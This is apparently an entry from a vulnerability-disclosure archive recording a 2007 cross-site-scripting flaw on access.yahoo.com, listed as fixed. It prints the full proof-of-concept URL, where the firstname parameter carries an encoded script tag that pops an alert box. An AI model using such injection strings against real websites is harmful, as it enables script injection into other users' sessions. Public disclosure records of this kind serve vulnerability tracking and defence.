Security researcher bill, has submitted on 15/04/2007 a cross-site-scripting (XSS) vulnerability affecting access.yahoo.com, which at the time of submission ranked 1 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 15/04/2007. It is currently fixed. |
| Date submitted: 15/04/2007 |
Date published: 15/04/2007 |
Date fixed: 05/06/2007 | Status:  FIXED |
| Author: bill |
Domain: access.yahoo.com |
Category: XSS |
Pagerank: 1 |
|---|
URL: http://access.yahoo.com/dsl/sbc/order;_ylt=AryyZjHEW6NfhmiSm9U3cvkfEMMF?page=red_sbc&firstname=asdf%
27e%22e%3Ee%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C&lastname=&email=&email2=&.tn=817-966-4624&af
filiateId=-1&altAddressReq=N&auth=&authMethod=&authString=&calendarDay=&calendarMonth=&calendarTime=
&calendarYear=&compType=&contactPref=&cos=¤tSbcisCustomer=&dir=ordercenter&equipID=&existc=&ho
me=&installID=&osId=&phone1=&phone2=&phone3=&phoneext=&priority=&promo=&pw=&qualColor=blue&sel_equip
ID=&sel_installID=&sel_servicePackageID=&servicePackageID=&ship_address=&ship_address2=&ship_choice=
&ship_city=&ship_name=&ship_state=&ship_zip=&SMB=N&trackingID=72864606&userdomain=&userid=&whena=&su
bmitBtn_f=%A0%A0Submit%A0%A0 |
|
Click here to view the mirror
|
|
|
| 
